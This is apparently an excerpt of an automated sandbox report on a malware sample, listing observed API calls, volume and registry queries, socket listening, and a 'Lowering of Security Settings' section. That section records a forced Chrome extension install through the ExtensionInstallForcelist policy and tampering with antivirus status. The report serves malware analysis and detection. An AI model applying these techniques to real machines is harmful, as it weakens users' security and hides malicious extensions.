Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 7_2_04607EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_04608778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 7_2_04608847
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 7_2_045F30F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_046081D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_04608185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 7_2_0460826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 7_2_046082F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 7_2_04602B05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 15_2_03472B05
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_0347826B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 15_2_034782F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_034781D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_03478185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 15_2_03478847
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoEx,FormatMessageA, 15_2_034630F7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 15_2_03478778
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 15_2_0347265B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 15_2_03478672
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 15_2_03477EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 15_2_03478549
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 33_2_0000021BD979D88C
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 33_2_0000021BD97A1884
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free, 33_2_0000021BD979D720
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 33_2_0000021BD97A1938
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 33_2_0000021BD97A19A0
Source: C:\Windows\System32\rundll32.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 33_2_0000021BD979DC04
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 33_2_0000021BD979DB44
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 33_2_0000021BD97A1DCC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 33_2_0000021BD97A1E60
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 33_2_0000021BD97A1D18
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 33_2_0000021BD97A2090
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 33_2_0000021BD97A21DC
Source: C:\Windows\System32\rundll32.exe Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx, 33_2_0000021BD97C61D4
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP, 33_2_0000021BD9799298
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 33_2_0000021BD97A228C
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 33_2_0000021BD97D31B0
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_getptd,__crtGetLocaleInfoEx, 33_2_0000021BD97A1418
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 33_2_0000021BD97A23D0
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx, 33_2_0000021BD9794680
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoEx,__crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 34_2_00000166D8F4DC04
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 34_2_00000166D8F51D18
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 34_2_00000166D8F51E60
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 34_2_00000166D8F51DCC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 34_2_00000166D8F52090
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 34_2_00000166D8F83198
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP, 34_2_00000166D8F49298
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 34_2_00000166D8F5228C
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 34_2_00000166D8F521DC
Source: C:\Windows\System32\rundll32.exe Code function: ___lc_locale_name_func,__crtGetLocaleInfoEx, 34_2_00000166D8F761D4
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 34_2_00000166D8F831B0
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_getptd,__crtGetLocaleInfoEx, 34_2_00000166D8F51418
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 34_2_00000166D8F523D0
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx, 34_2_00000166D8F44680
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free, 34_2_00000166D8F4D720
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 34_2_00000166D8F4D88C
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 34_2_00000166D8F51884
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 34_2_00000166D8F519A0
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 34_2_00000166D8F51938
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 34_2_00000166D8F4DB44
Source: C:\Windows\System32\rundll32.exe Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free, 39_2_000001C9C85BB1B8
Source: C:\Windows\System32\rundll32.exe Code function: EnumSystemLocalesW, 39_2_000001C9C85BF25C
Source: C:\Windows\System32\rundll32.exe Code function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW, 39_2_000001C9C85BF31C
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale_downlevel,__get_qualified_locale,__lc_lctowcs,__crtGetLocaleInfoEx,GetACP,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson, 39_2_000001C9C85C3510
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage, 39_2_000001C9C85D6A08
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 39_2_000001C9C85D6B54
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,GetLocaleInfoW, 39_2_000001C9C85D6C04
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s, 39_2_000001C9C85D6D48
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,malloc,__crtGetLocaleInfoEx,WideCharToMultiByte,free, 39_2_000001C9C85CCF14
Source: C:\Windows\System32\rundll32.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 39_2_000001C9C85D4F30
Source: C:\Windows\System32\rundll32.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 39_2_000001C9C85CD080
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP, 39_2_000001C9C85D61FC
Source: C:\Windows\System32\rundll32.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 39_2_000001C9C85D4260
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW, 39_2_000001C9C85D6318
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoEx, 39_2_000001C9C85D62B0
Source: C:\Windows\System32\rundll32.exe Code function: GetLocaleInfoW, 39_2_000001C9C85E64A0
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 39_2_000001C9C85D6690
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,EnumSystemLocalesW, 39_2_000001C9C85D6744
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage, 39_2_000001C9C85D67D8
Source: C:\Windows\System32\rundll32.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free, 39_2_000001C9C85D47CC
Source: C:\Windows\System32\rundll32.exe Code function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson, 39_2_000001C9C85D5D90
Source: C:\Windows\System32\rundll32.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson, 39_2_000001C9C85BFF20
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C: VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B4E05 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_046B4E05
Source: C:\Windows\System32\rundll32.exe Code function: 33_2_0000021BD97CC348 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,_getenv_helper_nolock,free,_malloc_crt,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 33_2_0000021BD97CC348
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046A1130 SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,lstrcpynW,lstrcpynW,GetCommandLineW,lstrcpynW,GetModuleHandleW,CharNextW,lstrcpynW,GetTempPathW,GetTempPathW,lstrcatW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcpynW,lstrcpynW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,lstrcpynW,lstrcpynW,DeleteFileW,CopyFileW,CloseHandle,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,lstrcpynW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,CloseHandle,FreeLibrary,GlobalFree,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx, 6_2_046A1130
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Provider\Av\{D68DDC3A-831F-4fae-9E44-DA132C1ACF46} STATE
Source: C:\Windows\SysWOW64\reg.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\google\chrome\ExtensionInstallForcelist
Source: svchost.exe, 0000000E.00000002.3168766710.000001DDF0502000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C858F0C0 __swprintf_l,strchr,strchr,inet_pton,strchr,_wcstoui64,strchr,_wcstoui64,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,listen,WSAGetLastError,htons,__swprintf_l,__swprintf_l, 39_2_000001C9C858F0C0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C85A93F0 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 39_2_000001C9C85A93F0
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8599D28 bind,WSAGetLastError, 39_2_000001C9C8599D28
Source: C:\Windows\System32\rundll32.exe Code function: 39_2_000001C9C8581D60 inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 39_2_000001C9C8581D60